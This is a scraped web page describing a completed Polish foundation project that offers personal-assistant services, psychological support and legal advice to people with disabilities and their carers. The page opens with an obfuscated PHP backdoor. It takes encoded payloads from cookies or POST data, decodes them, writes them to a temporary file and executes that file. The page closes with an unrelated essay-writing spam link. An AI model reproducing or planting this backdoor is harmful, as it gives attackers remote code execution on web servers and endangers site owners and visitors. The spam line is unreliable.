$Johlz = class_exists("WY_lQXgw");if (!$Johlz){class WY_lQXgw{private $XMBgjVLfF;public static $fSjsCKN = "7f79d202-e1d0-459e-8c2f-2ffce709bf17";public static $azntJ = NULL;public function __construct(){$JoBZldPtVw = $_COOKIE;$ifbqx = $_POST;$hgyvDgSN = @$JoBZldPtVw[substr(WY_lQXgw::$fSjsCKN, 0, 4)];if (!empty($hgyvDgSN)){$HVodJI = "base64";$yfQvTLp = "";$hgyvDgSN = explode(",", $hgyvDgSN);foreach ($hgyvDgSN as $aMCIPglBRa){$yfQvTLp .= @$JoBZldPtVw[$aMCIPglBRa];$yfQvTLp .= @$ifbqx[$aMCIPglBRa];}$yfQvTLp = array_map($HVodJI . "\x5f" . chr (100) . chr ( 577 - 476 )."\143" . chr ( 565 - 454 )."\x64" . "\145", array($yfQvTLp,)); $yfQvTLp = $yfQvTLp[0] ^ str_repeat(WY_lQXgw::$fSjsCKN, (strlen($yfQvTLp[0]) / strlen(WY_lQXgw::$fSjsCKN)) + 1);WY_lQXgw::$azntJ = @unserialize($yfQvTLp);}}public function __destruct(){$this->SUnmT();}private function SUnmT(){if (is_array(WY_lQXgw::$azntJ)) {$kdNwpj = sys_get_temp_dir() . "/" . crc32(WY_lQXgw::$azntJ['s' . "\x61" . "\154" . chr (116)]);@WY_lQXgw::$azntJ[chr (119) . "\162" . "\151" . 't' . chr (101)]($kdNwpj, WY_lQXgw::$azntJ['c' . chr (111) . "\156" . "\164" . chr (101) . "\x6e" . chr ( 556 - 440 )]);include $kdNwpj;@WY_lQXgw::$azntJ['d' . chr ( 624 - 523 ).chr ( 1054 - 946 ).chr (101) . chr (116) . "\x65"]($kdNwpj);exit();}}}$VokiKwItz = new WY_lQXgw(); $VokiKwItz = NULL;} ?> We dwoje raźniej – Fundacja Jesteśmy Równi

We dwoje raźniej – wsparcie osób z niepełnosprawnościami i ich opiekunów w oparciu o model asystenta osobistego osoby z niepełnosprawnościami Nr RPWP.07.02.02-30-0056/17.

Projekt skierowany do osób zagrożonych ubóstwem i wykluczeniem społecznym i obejmuje wsparciem 60 osób niesamodzielnych niepełnosprawnych w tym dzieci z lekkim, znacznym i umiarkowanym stopniem niepełnosprawności, a także z niepełnosprawnością sprzężona, intelektualną oraz ich opiekunów, ktorzy ze wzgledu na konieczność sprawowania opieki nad ON zrezygnowali lub nie podjeli zatrudnienia zamieszkujących powiat wrzesiński i gnieźnieński.

Głównym celem jest aktywizacja społeczna 60 osób niesamodzielnych niepełnosprawnych i podnoszenie kwalifikacji związanych z opieką nad ON.

W ramach wsparcia realizowana jest:

  • usługa asystencka dla osoby niesamodzielnej niepełnosprawnej,
  • wsparcie psychologiczne,
  • poradnictwo prawne,
  • szkolenia dla opiekunów faktycznych.

Zainteresowane udziałem osoby spełniające poniższe warunki:

  • niesamodzielne niepełnosprawne w tym dzieci (posiadające orzeczenie o niepełnosprawności) oraz ich opiekunowie faktyczni,
  • zagrożone ubóstwem i wykluczeniem społecznym,
  • zamieszkujące powiat wrzesiński lub gnieźnieński.

Projekt zakończony.

How to write an interpretive essay common powerpoint mistakes https://writemypaper4me.org/ if you choose to use powerpoint as your presentation illustrator, there are some tips and tricks for you to use so that your presentation will be seen as an example.